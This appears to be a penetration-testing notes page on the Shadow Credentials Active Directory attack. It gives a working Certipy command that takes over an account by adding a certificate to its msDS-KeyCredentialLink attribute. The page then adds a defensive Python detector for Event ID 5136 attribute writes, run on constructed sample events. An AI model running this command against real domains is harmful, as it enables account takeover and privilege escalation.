Shadow Credentials

Last modified: 2023-11-11

Active Directory Privilege Escalation Windows

Shadow Credentials is an attack technique that takes over an Active Directory user or computer account by compromising the msDS-KeyCredentialLink property of the target object.


If an attacker can modify the msDS-KeyCredentialLink attribute of the target object (a user or computer account) and append alternate credentials in the form of certificates, the attacker takes over the account in AD.

# -k: Use Kerberos authentication
certipy shadow auto -account "targetuser" -u "username@example.local" -p 'password' -dc-ip <DC_IP> -target dc.example.local -k
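
A defender-side check for the attribute write described above, as an added example (not from the original page or from Certipy): it filters Directory Service Changes records (Event ID 5136) for values added to msDS-KeyCredentialLink by accounts that are not expected to write it. Event 5136 is only logged when Directory Service Changes auditing is enabled and a SACL covers the object. The sample events, the `svc_aadsync` allowlist entry and the function names are constructed assumptions.

```python
# Added example: triage Event ID 5136 (Directory Service Changes) records for
# values added to msDS-KeyCredentialLink. All sample data below is constructed.
ATTRIBUTE = "msds-keycredentiallink"
VALUE_ADDED = "%%14674"  # OperationType code 5136 uses for "Value Added"

# Assumption: accounts expected to write key credentials in this environment,
# e.g. a directory-sync service account. The name is hypothetical.
EXPECTED_WRITERS = {"svc_aadsync"}

def _event(subject, object_dn, attribute, operation=VALUE_ADDED):
    """Build a constructed record with the EventData field names of 5136."""
    return {"EventID": 5136, "SubjectUserName": subject, "ObjectDN": object_dn,
            "AttributeLDAPDisplayName": attribute, "OperationType": operation}

SAMPLE_EVENTS = [
    _event("svc_aadsync", "CN=Alice,OU=Staff,DC=example,DC=local", "msDS-KeyCredentialLink"),
    _event("jdoe", "CN=targetuser,OU=Staff,DC=example,DC=local", "msDS-KeyCredentialLink"),
    _event("WS01$", "CN=WS01,OU=Workstations,DC=example,DC=local", "msDS-KeyCredentialLink"),
    _event("jdoe", "CN=Bob,OU=Staff,DC=example,DC=local", "description"),
    _event("jdoe", "CN=Bob,OU=Staff,DC=example,DC=local", "msDS-KeyCredentialLink", "%%14675"),
]

def is_self_write(event):
    """Heuristic: a computer account (NAME$) changed its own object (CN=NAME,...)."""
    subject = event.get("SubjectUserName", "").lower()
    first_rdn = event.get("ObjectDN", "").split(",", 1)[0].lower()
    return subject.endswith("$") and first_rdn == "cn=" + subject[:-1]

def key_credential_findings(events, expected_writers=EXPECTED_WRITERS):
    """Return one finding per unexpected key-credential addition."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != ATTRIBUTE:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        writer = ev.get("SubjectUserName", "")
        if writer.lower() in expected_writers:
            continue
        # Self-writes are kept in the output, only labelled, so they can be
        # prioritised separately instead of being silently dropped.
        findings.append({"writer": writer, "target": ev.get("ObjectDN", ""),
                         "self_write": is_self_write(ev)})
    return findings

if __name__ == "__main__":
    for finding in key_credential_findings(SAMPLE_EVENTS):
        print(finding)
```

On the constructed sample this reports the write by `jdoe` to `targetuser` and the self-write by `WS01$`, and skips the allowlisted writer, the unrelated attribute and the value deletion.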